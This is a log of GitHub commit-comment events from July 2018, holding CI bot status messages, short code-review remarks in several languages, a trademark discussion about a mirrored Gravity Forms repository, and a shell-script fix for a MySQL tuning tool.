{"id":"7963307327","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29702598,"position":null,"line":null,"path":null,"commit_id":"332260c5cd8096e8db09f30ce06ed7935072fda3","created_at":"2018-07-13T17:05:45Z","updated_at":"2018-07-13T17:05:45Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-722](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-722).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-722-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T17:05:45Z"}
{"id":"7963309535","type":"CommitCommentEvent","actor":{"login":"oyvindln"},"repo":{"name":"Frommi/miniz_oxide"},"payload":{"comment":{"id":29702600,"position":null,"line":null,"path":null,"commit_id":"a40d7511edc3776fd0fc7fb49611df009db1fa67","created_at":"2018-07-13T17:06:16Z","updated_at":"2018-07-13T17:06:16Z","author_association":"COLLABORATOR","body":"Sounds good."}},"created_at":"2018-07-13T17:06:16Z"}
{"id":"7963309612","type":"CommitCommentEvent","actor":{"login":"drzraf"},"repo":{"name":"wp-premium/gravityforms"},"payload":{"comment":{"id":29702602,"position":null,"line":null,"path":null,"commit_id":"42f34c40fc9ee8bff4f716e30ba87149cb33f28e","created_at":"2018-07-13T17:06:17Z","updated_at":"2018-07-13T17:06:17Z","author_association":"NONE","body":"Any serious developer needs access to releases through `Composer` + `GitHub/GitLab` and `wp-premium` is a godsend for all of us who, having bought the license for the product (being ACF-pro or GF*) still need to deploy them in a professional way.\r\n\r\nAbout trademark:\r\nNothing: https://euipo.europa.eu/eSearch/#basic/1+1+1+1/100+100+100+100/gravityforms\r\nNothing: http://tmsearch.uspto.gov/bin/showfield?f=toc&state=4802%3A2nvadx.1.1&p_search=searchss&p_L=50&BackReference=&p_plural=yes&p_s_PARA1=&p_tagrepl%7E%3A=PARA1%24LD&expr=PARA1+AND+PARA2&p_s_PARA2=gravityforms&p_tagrepl%7E%3A=PARA2%24COMB&p_op_ALL=AND&a_default=search&a_search=Submit+Query&a_search=Submit+Query\r\n\r\n@remcotolsma \r\n`find . -name '*gravityforms*' | while read f; do git mv \"$f\" \"${f/gravityforms/gravityfoo}\"; done`\r\n`git grep -l gravityforms|xargs -n1 echo sed -i 's/gravityforms/gravityfoo/'`\r\n\r\nbut rocketgenius providing composer-friendly releases, be it via GitHub or via [semi-private Satis instance](https://getcomposer.org/doc/articles/handling-private-packages-with-satis.md#security) would be a far better solution."}},"created_at":"2018-07-13T17:06:17Z"}
{"id":"7963311627","type":"CommitCommentEvent","actor":{"login":"OcenaBlue"},"repo":{"name":"OcenaBlue/OcenaBlue.github.io"},"payload":{"comment":{"id":29702609,"position":null,"line":null,"path":null,"commit_id":"b0f5a906406ad6709800cf30e53631947ab61784","created_at":"2018-07-13T17:06:46Z","updated_at":"2018-07-13T17:06:46Z","author_association":"OWNER","body":"deleted."}},"created_at":"2018-07-13T17:06:46Z"}
{"id":"7963316133","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29702620,"position":null,"line":null,"path":null,"commit_id":"b8ce0b772b4f97811ac47aac00266e3d6edd434b","created_at":"2018-07-13T17:07:48Z","updated_at":"2018-07-13T17:07:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-122](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-122).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-122-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-13T17:07:48Z"}
{"id":"7963316801","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ShinyaKato/seccamp2018"},"payload":{"comment":{"id":29702621,"position":32,"line":11,"path":"tests/map_driver.c","commit_id":"33e7326dc0c3c07512fd85894d8cfdc12fa92d16","created_at":"2018-07-13T17:07:56Z","updated_at":"2018-07-13T17:07:56Z","author_association":"NONE","body":"sprintf(keys[i], \"%05d\", i)で十分？"}},"created_at":"2018-07-13T17:07:56Z"}
{"id":"7963317114","type":"CommitCommentEvent","actor":{"login":"crdsTeamCity"},"repo":{"name":"crdschurch/crds-styleguide"},"payload":{"comment":{"id":29702622,"position":null,"line":null,"path":null,"commit_id":"fd256acbcea6786cf5ef38db1b451311627dcec4","created_at":"2018-07-13T17:08:00Z","updated_at":"2018-07-13T17:08:00Z","author_association":"NONE","body":"TeamCity Code / 1. Development / DDK / Feature [Build 600](https://ci.crossroads.net/viewLog.html?buildId=54240&buildTypeId=Code_Development_Ddk_Feature) outcome was **SUCCESS**\nSummary: Tests passed: 69 Build time: 00:02:33"}},"created_at":"2018-07-13T17:08:00Z"}
{"id":"7963318405","type":"CommitCommentEvent","actor":{"login":"Creedexchange"},"repo":{"name":"Creedexchange/creedexchange.github.io"},"payload":{"comment":{"id":29702625,"position":1,"line":1,"path":"docs/API.md","commit_id":"0c067edca16b921b4326e306b602e17e5bd06130","created_at":"2018-07-13T17:08:17Z","updated_at":"2018-07-13T17:08:17Z","author_association":"OWNER","body":"-API # Creedexchange"}},"created_at":"2018-07-13T17:08:17Z"}
{"id":"7963318977","type":"CommitCommentEvent","actor":{"login":"hdgarrood"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29702627,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-13T17:08:25Z","updated_at":"2018-07-13T17:08:25Z","author_association":"CONTRIBUTOR","body":"Sounds sensible enough. Are you imagining this comment would go in the source code, just above the line which was added in this commit?"}},"created_at":"2018-07-13T17:08:25Z"}
{"id":"7963319860","type":"CommitCommentEvent","actor":{"login":"mdanatg"},"repo":{"name":"tensorflow/models"},"payload":{"comment":{"id":29702628,"position":null,"line":null,"path":null,"commit_id":"6e2eac32e825e11cb766ffb1e6af8a9f9385f238","created_at":"2018-07-13T17:08:39Z","updated_at":"2018-07-13T17:08:39Z","author_association":"NONE","body":"There is a caveat here: typically, converted code will execute just fine in eager mode, but the gradient tape will error out because it doesn't support things like tf.cond and and tf.while_loop. Also, defun doesn't currently work with some of the combinations of code that autograph generates.\r\n\r\nSo it probably makes sense to rephrase it in the lines of \"The converted code is designed to run in graph mode, so when eager mode is enabled, use explicit graphs [etc]\"."}},"created_at":"2018-07-13T17:08:39Z"}
{"id":"7963321310","type":"CommitCommentEvent","actor":{"login":"rhys19"},"repo":{"name":"rhys19/Menu"},"payload":{"comment":{"id":29702629,"position":null,"line":null,"path":null,"commit_id":"820255f65c575a6b8d960e84a15d6dc34fea56f4","created_at":"2018-07-13T17:09:00Z","updated_at":"2018-07-13T17:09:00Z","author_association":"OWNER","body":"Removed Copy of lucifier's code!\r\n\r\nContinuing old project"}},"created_at":"2018-07-13T17:09:00Z"}
{"id":"7963321605","type":"CommitCommentEvent","actor":{"login":"rui314"},"repo":{"name":"ushitora-anqou/aqcc"},"payload":{"comment":{"id":29702630,"position":71,"line":898,"path":"main.c","commit_id":"dae2c3b2d9731080d2ad8ffe79184a7e9d7a6aee","created_at":"2018-07-13T17:09:05Z","updated_at":"2018-07-13T17:09:05Z","author_association":"NONE","body":"ceilのためだけに浮動小数点数を使うのは避けたほうがいいかもですね。ビット操作か%とかでいけるのでは。"}},"created_at":"2018-07-13T17:09:05Z"}
{"id":"7963324309","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29702638,"position":null,"line":null,"path":null,"commit_id":"e62e8f0661ad514c93b7cccdac01ecffa2f3a37c","created_at":"2018-07-13T17:09:44Z","updated_at":"2018-07-13T17:09:44Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-13T17:09:44Z"}
{"id":"7963327279","type":"CommitCommentEvent","actor":{"login":"akutuzov"},"repo":{"name":"RaRe-Technologies/gensim"},"payload":{"comment":{"id":29702643,"position":180,"line":143,"path":"gensim/models/keyedvectors.py","commit_id":"90c22fdbeeef11cb4cd2929053eee0ca0c409ba1","created_at":"2018-07-13T17:10:24Z","updated_at":"2018-07-13T17:10:24Z","author_association":"CONTRIBUTOR","body":"https://github.com/RaRe-Technologies/gensim/pull/2130"}},"created_at":"2018-07-13T17:10:24Z"}
{"id":"7963330344","type":"CommitCommentEvent","actor":{"login":"fdbergeron"},"repo":{"name":"fdbergeron/fdbergeron.github.io"},"payload":{"comment":{"id":29702650,"position":null,"line":null,"path":null,"commit_id":"6f940d5b7dfc8e4d1ef9a562fd8588914e312e22","created_at":"2018-07-13T17:11:06Z","updated_at":"2018-07-13T17:11:06Z","author_association":"OWNER","body":"x"}},"created_at":"2018-07-13T17:11:06Z"}
{"id":"7963336637","type":"CommitCommentEvent","actor":{"login":"Perhelion"},"repo":{"name":"Perhelion/mediawiki-extensions-Thanks"},"payload":{"comment":{"id":29702662,"position":null,"line":null,"path":null,"commit_id":"7938e80daea0dd4515b6e00696cb6acd07a2ba5b","created_at":"2018-07-13T17:12:30Z","updated_at":"2018-07-13T17:12:30Z","author_association":"OWNER","body":"better code would be here https://commons.wikimedia.org/wiki/File:Echo_icon_Thanks-smiley.svg"}},"created_at":"2018-07-13T17:12:30Z"}
{"id":"7963341268","type":"CommitCommentEvent","actor":{"login":"isabellaCE"},"repo":{"name":"isabellaCE/Curso-Git"},"payload":{"comment":{"id":29702666,"position":null,"line":null,"path":null,"commit_id":"bdb5ea35ce59639638ef963a8b74f3b2ce5b86cf","created_at":"2018-07-13T17:13:21Z","updated_at":"2018-07-13T17:13:21Z","author_association":"OWNER","body":"ISSO É UMA PORCARIA , NÃO SEI PQ O SANDRO INVENTA DE MANDAR A  GNT A FZR ESSAS COISAS\r\n"}},"created_at":"2018-07-13T17:13:21Z"}
{"id":"7963345956","type":"CommitCommentEvent","actor":{"login":"n-peugnet"},"repo":{"name":"S4L1M00/SymfonyActivite3"},"payload":{"comment":{"id":29702670,"position":null,"line":null,"path":null,"commit_id":"14ec3bd19177aeebd18dbf248e0d1a1135cb2d12","created_at":"2018-07-13T17:14:21Z","updated_at":"2018-07-13T17:14:21Z","author_association":"NONE","body":"Oh yeah baby, par contre je pense que tu devrais rajouter les dossiers `/var/logs` `/var/cache` et `/vendor` au .gitignore"}},"created_at":"2018-07-13T17:14:21Z"}
{"id":"7963347633","type":"CommitCommentEvent","actor":{"login":"SIX10"},"repo":{"name":"SIX10/Partly"},"payload":{"comment":{"id":29702674,"position":null,"line":null,"path":null,"commit_id":"a6b8abe3d9c0f4a3a0885cd63841a93859fe568d","created_at":"2018-07-13T17:14:45Z","updated_at":"2018-07-13T17:14:45Z","author_association":"OWNER","body":"Want to clarify p+webm wasn't removed, just webm folder on github"}},"created_at":"2018-07-13T17:14:45Z"}
{"id":"7963347910","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29702676,"position":null,"line":null,"path":null,"commit_id":"4da1e596e9090c68a2bb9804a80a0a8e85703b51","created_at":"2018-07-13T17:14:49Z","updated_at":"2018-07-13T17:14:49Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-124](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-124).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-124-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-13T17:14:49Z"}
{"id":"7963348204","type":"CommitCommentEvent","actor":{"login":"Kuladeep0486"},"repo":{"name":"Kuladeep0486/installations"},"payload":{"comment":{"id":29702678,"position":null,"line":null,"path":null,"commit_id":"2115dbabc966ffdea077a8705ecd1a3df34e7907","created_at":"2018-07-13T17:14:52Z","updated_at":"2018-07-13T17:14:52Z","author_association":"OWNER","body":"change in source"}},"created_at":"2018-07-13T17:14:52Z"}
{"id":"7963351127","type":"CommitCommentEvent","actor":{"login":"Jackchows"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29702692,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-13T17:15:29Z","updated_at":"2018-07-13T17:15:29Z","author_association":"OWNER","body":"衹有G源第二碼是「卜」，U源和T源都是「大」（雖然沈紅蓮女士說台標「育」頭可以取「卜戈」，但是似乎有些爭議，所以暫時沒有使用）。\r\n而G源是「水卜**山**水」而非「水卜**女**水」。"}},"created_at":"2018-07-13T17:15:29Z"}
{"id":"7963353937","type":"CommitCommentEvent","actor":{"login":"ragesoss"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":29702697,"position":null,"line":null,"path":null,"commit_id":"218210bbde8a035dbb22c191f8c720107f0afd76","created_at":"2018-07-13T17:16:08Z","updated_at":"2018-07-13T17:16:08Z","author_association":"MEMBER","body":"@ihsavru this sorts out a few more little bugs. In general, I think we should try to minimize the use of componentWillReceiveProps where we can, as its behavior can be pretty confusing in terms of first-mount vs re-render."}},"created_at":"2018-07-13T17:16:08Z"}
{"id":"7963371351","type":"CommitCommentEvent","actor":{"login":"eric-chen-ck"},"repo":{"name":"jcchavezs/zipkin-php"},"payload":{"comment":{"id":29702732,"position":34,"line":131,"path":"tests/Integration/Reporters/Http/CurlFactoryTest.php","commit_id":"08bd91f82cc667fedaecd7c0a5f500ae2400e61f","created_at":"2018-07-13T17:20:07Z","updated_at":"2018-07-13T17:20:07Z","author_association":"NONE","body":"Does this work?  I ask because it's possible that server shutdown might generate some output on `stdout` which could affect the return value of `ob_get_clean()`."}},"created_at":"2018-07-13T17:20:07Z"}
{"id":"7963372614","type":"CommitCommentEvent","actor":{"login":"eric-chen-ck"},"repo":{"name":"jcchavezs/zipkin-php"},"payload":{"comment":{"id":29702735,"position":48,"line":158,"path":"tests/Integration/Reporters/Http/CurlFactoryTest.php","commit_id":"08bd91f82cc667fedaecd7c0a5f500ae2400e61f","created_at":"2018-07-13T17:20:23Z","updated_at":"2018-07-13T17:20:23Z","author_association":"NONE","body":"Same as above."}},"created_at":"2018-07-13T17:20:23Z"}
{"id":"7963375055","type":"CommitCommentEvent","actor":{"login":"Jocalinux"},"repo":{"name":"mattiabasone/tuning-primer"},"payload":{"comment":{"id":29702742,"position":null,"line":null,"path":null,"commit_id":"9a38370e514e5a91d5fc57ea6950d34bdc9df227","created_at":"2018-07-13T17:20:55Z","updated_at":"2018-07-13T17:20:55Z","author_association":"NONE","body":"@mattiabasone ,\r\n\r\nI founded an error in 'tuning-primer.sh' with Red Hat Enterprise Linux 7x and CentOS 7x. For default, this Linux distributions, not installed the 'netstat' command in minimal installation and sometimes, your installation is not possible (as my case).\r\n\r\nShow the error:\r\n\r\n./tuning-primer.sh \r\n./tuning-primer.sh: line 1482: netstat: command not found\r\n./tuning-primer.sh: line 1483: netstat: command not found\r\n\r\nSo, I change the script ('get_system_info()') to this:\r\n--------------------------------------------------------------------------------------------------------------------------\r\n\r\nget_system_info () {\r\n\r\n    export OS=$(uname)\r\n\r\n    # Get information for various UNIXes\r\n    if [ \"$OS\" = 'Darwin' ]; then\r\n        ps_socket=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }' | head -1)\r\n        found_socks=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }')\r\n        export physical_memory=$(sysctl -n hw.memsize)\r\n        export duflags=''\r\n    fi\r\n    if [ \"$OS\" = 'FreeBSD' ] || [ \"$OS\" = 'OpenBSD' ]; then\r\n        ## On FreeBSD must be root to locate sockets.\r\n        ps_socket=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }' | head -1)\r\n        found_socks=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }')\r\n        export physical_memory=$(sysctl -n hw.realmem)\r\n        export duflags=''\r\n    fi\r\n    if [ \"$OS\" = 'Linux' ] ; then\r\n        # Check for Red Hat Enterprise Linux 7x & CentOS 7x\r\n        if [ -f \"/etc/redhat-release\" ] ; then\r\n                VERSION=`cat /etc/redhat-release | grep \"7.\"`\r\n                if [[ ${VERSION} =~ .*'7.'.* ]] ; then\r\n                        ps_socket=$(ss -ln | grep mysql*.sock | awk -F ' ' '{ print $5 }' | head -1)\r\n                        found_socks=$(ss -ln | grep mysql*.sock | awk -F ' ' '{ print $5 }')\r\n                        export physical_memory=$(awk '/^MemTotal/ { printf(\"%.0f\", $2*1024 ) }' < /proc/meminfo)\r\n                        export duflags='-b'\r\n                fi\r\n        else\r\n        ## Includes SWAP\r\n        ## export physical_memory=$(free -b | grep -v buffers |  awk '{ s += $2 } END { printf(\"%.0f\\n\", s ) }')\r\n        ps_socket=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }' | head -1)\r\n        found_socks=$(netstat -ln | awk '/mysql(.*)?\\.sock/ { print $9 }')\r\n        export physical_memory=$(awk '/^MemTotal/ { printf(\"%.0f\", $2*1024 ) }' < /proc/meminfo)\r\n        export duflags='-b'\r\n        fi\r\n    fi\r\n    if [ \"$OS\" = 'SunOS' ] ; then\r\n        ps_socket=$(netstat -an | awk '/mysql(.*)?.sock/ { print $5 }' | head -1)\r\n        found_socks=$(netstat -an | awk '/mysql(.*)?.sock/ { print $5 }')\r\n        export physical_memory=$(prtconf | awk '/^Memory\\ size:/ { print $3*1048576 }')\r\n    fi\r\n    if [ -z $(which bc) ] ; then\r\n        echo \"Error: Command line calculator 'bc' not found!\"\r\n        exit\r\n    fi\r\n}\r\n--------------------------------------------------------------------------------------------------------------------------\r\nAfter this changes, I will can run the script without problems. ;)\r\n\r\nIn attached, I send the modified script.\r\n\r\nBest regards,\r\nJocalinux.\r\n\r\n![error-and-error-fixed](https://user-images.githubusercontent.com/39717641/42704879-e6909404-86a7-11e8-8fd5-62fe68809eab.png)\r\n![run-tuning-primer-modified](https://user-images.githubusercontent.com/39717641/42704880-e6c8a592-86a7-11e8-9578-a3021fefc218.png)\r\n[tuning-primer-for-rhel7x-centos7x.sh.gz](https://github.com/mattiabasone/tuning-primer/files/2193601/tuning-primer-for-rhel7x-centos7x.sh.gz)\r\n\r\n"}},"created_at":"2018-07-13T17:20:55Z"}
{"id":"7963375666","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29702748,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T17:21:03Z","updated_at":"2018-07-13T17:21:03Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2314 of 2314 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-13T17:21:03Z"}
{"id":"7963378476","type":"CommitCommentEvent","actor":{"login":"LunDev"},"repo":{"name":"MyRobotLab/myrobotlab"},"payload":{"comment":{"id":29702757,"position":23,"line":207,"path":"src/main/java/org/myrobotlab/service/WebkitSpeechRecognition.java","commit_id":"76d8b114a7804db03418105b4f57f47ad72b5ae4","created_at":"2018-07-13T17:21:43Z","updated_at":"2018-07-13T17:21:43Z","author_association":"MEMBER","body":"heh, _please close [...] internet connection_ ^^\r\n(sorry)"}},"created_at":"2018-07-13T17:21:43Z"}
{"id":"7963379584","type":"CommitCommentEvent","actor":{"login":"carlhancock"},"repo":{"name":"wp-premium/gravityforms"},"payload":{"comment":{"id":29702759,"position":null,"line":null,"path":null,"commit_id":"42f34c40fc9ee8bff4f716e30ba87149cb33f28e","created_at":"2018-07-13T17:22:00Z","updated_at":"2018-07-13T17:22:00Z","author_association":"NONE","body":"@drzraf You aren't searching the correct place for federal trademarks. The USPTO site isn't so user friendly so it's easy to search the wrong place.  But rest assured it's an active registered trademark. It's USPTO serial number is #86114563 and it's USPTO registration number is #4563308.\r\n\r\nMy comment was not meant to start an argument on what developers do and don't need.  It was to broach the subject of code changes and trademark in a friendly manner. If we wanted to do so in a non-friendly way we would have simply approached Github directly and had them take it down.  But we do not want to do that.\r\n\r\nAs the holder of the trademark and copyright the onus is on us as a company to point out that when you start making code changes to the codebase in an unofficial mirror it ceases being a mirror and becomes a fork and with that comes additional requirements from a licensing and trademark standpoint.  \r\n\r\nThe reason this mirror has existed without issue is precisely because code changes had not been made.  Once code changes are made it changes the dynamics from a legal standpoint. The legalities may suck, but it's something that has to be brought up because as a trademark and copyright holder we have a legal obligation to bring it up.\r\n\r\nGravity Forms has a Github repository but it is currently private as I mentioned.  **However, we do grant access to developers who request it on a case by case basis.**  We just haven't opened it up globally just yet as we don't have the bandwidth to deal with the volume of PR's and other such requests that would sure to follow.  But we do actively have 3rd party developers who have access to the repo and do actively contribute to the Gravity Forms codebase via PR's and commits.  **If you (or any other user of this repo) would like access to the official Gravity Forms repo simply reach out to us directly.**"}},"created_at":"2018-07-13T17:22:00Z"}
{"id":"7963381646","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29702766,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T17:22:28Z","updated_at":"2018-07-13T17:22:28Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T17:22:28Z"}
{"id":"7963383828","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29702772,"position":null,"line":null,"path":null,"commit_id":"8880b6821002b287f25007323aea89dd4fe44569","created_at":"2018-07-13T17:23:00Z","updated_at":"2018-07-13T17:23:00Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `metadata_passing` |       -1 |\n| `metadata_total`   |       -3 |\n| `texts_total`      |       -1 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4449)*\n"}},"created_at":"2018-07-13T17:23:00Z"}
{"id":"7963409879","type":"CommitCommentEvent","actor":{"login":"roryk"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29702849,"position":null,"line":null,"path":null,"commit_id":"cfd2a50affc48377899231c57f8522a23aa52144","created_at":"2018-07-13T17:28:56Z","updated_at":"2018-07-13T17:28:56Z","author_association":"COLLABORATOR","body":"Thanks Lorena, looks good."}},"created_at":"2018-07-13T17:28:56Z"}
{"id":"7963410313","type":"CommitCommentEvent","actor":{"login":"Khrin"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29702850,"position":null,"line":null,"path":null,"commit_id":"1199a4873fa1b37b835f60f8c8f6bc189b4461a1","created_at":"2018-07-13T17:29:03Z","updated_at":"2018-07-13T17:29:03Z","author_association":"MEMBER","body":"Hi, sorry but I believe that your service anyway perfectly falls into EasyPrivacy policy, because still collect and store sensitive data, so the filter will remain. (Though one has been modified to don't break again your website. https://github.com/easylist/easylist/commit/087cc2546885251551d659ad08918859e1e325e5) "}},"created_at":"2018-07-13T17:29:03Z"}
{"id":"7963411372","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29702852,"position":null,"line":null,"path":null,"commit_id":"d31e91c34f114aab6b0247ed77a2940753f8a1d4","created_at":"2018-07-13T17:29:17Z","updated_at":"2018-07-13T17:29:17Z","author_association":"NONE","body":"PrepFor90 (Myoldmopar) - x86_64-MacOS-10.9-clang: Tests Failed (2405 of 2934 tests passed, 94 test warnings)\n\nMessages:\n\n * 621 tests had: EIO diffs.\n * 529 tests had: Table big diffs.\n * 8 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 94\n * Failed: 529\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d31e91c34f114aab6b0247ed77a2940753f8a1d4-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d31e91c34f114aab6b0247ed77a2940753f8a1d4-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.97%25-red.png)</a> \n"}},"created_at":"2018-07-13T17:29:17Z"}
{"id":"7963415871","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29702863,"position":null,"line":null,"path":null,"commit_id":"f1442f3e9a5900cb7fc97f6baae996c007c6d084","created_at":"2018-07-13T17:30:20Z","updated_at":"2018-07-13T17:30:20Z","author_association":"COLLABORATOR","body":"I think the names of the functions in this file are too long..."}},"created_at":"2018-07-13T17:30:20Z"}
{"id":"7963417440","type":"CommitCommentEvent","actor":{"login":"danny0838"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29702865,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-13T17:30:41Z","updated_at":"2018-07-13T17:30:41Z","author_association":"NONE","body":"原來是這個問題，我有疑問也很久了，另闢一篇討論吧: #111"}},"created_at":"2018-07-13T17:30:41Z"}
{"id":"7963423615","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29702885,"position":null,"line":null,"path":null,"commit_id":"70cd902c7143522970cd155da8ec302872cbca2c","created_at":"2018-07-13T17:32:06Z","updated_at":"2018-07-13T17:32:06Z","author_association":"COLLABORATOR","body":"@pauldhein - I removed the .png files from the repo since they can be generated using the source code (and in general git can't diff non-text files so in the long run, having many versions will lead to repo bloat). \r\n\r\nPlus this gives us some more motivation to make sure the code works on multiple computers :)"}},"created_at":"2018-07-13T17:32:06Z"}
{"id":"7963424627","type":"CommitCommentEvent","actor":{"login":"Mohammad-Zaboor"},"repo":{"name":"Merwais-Muafaq/DemoApp"},"payload":{"comment":{"id":29702889,"position":null,"line":null,"path":null,"commit_id":"b5153a15398b1f84d0de4adc4e4223f6083e443d","created_at":"2018-07-13T17:32:20Z","updated_at":"2018-07-13T17:32:20Z","author_association":"COLLABORATOR","body":"new is"}},"created_at":"2018-07-13T17:32:20Z"}
{"id":"7963428995","type":"CommitCommentEvent","actor":{"login":"mvdbeek"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":29702898,"position":5,"line":473,"path":"lib/galaxy/tools/parameters/dynamic_options.py","commit_id":"491841275678e522ece73c0533974dcf2c46dfb7","created_at":"2018-07-13T17:33:22Z","updated_at":"2018-07-13T17:33:22Z","author_association":"OWNER","body":"Otherwise self isn't in the scope on python 3"}},"created_at":"2018-07-13T17:33:22Z"}
{"id":"7963429729","type":"CommitCommentEvent","actor":{"login":"laurelherting"},"repo":{"name":"laurelherting/relay-modern"},"payload":{"comment":{"id":29702901,"position":null,"line":null,"path":null,"commit_id":"b784f8145aa5196ba69fd81398ee8a910a3393fa","created_at":"2018-07-13T17:33:32Z","updated_at":"2018-07-13T17:33:32Z","author_association":"OWNER","body":"rebase, wrong msg"}},"created_at":"2018-07-13T17:33:32Z"}
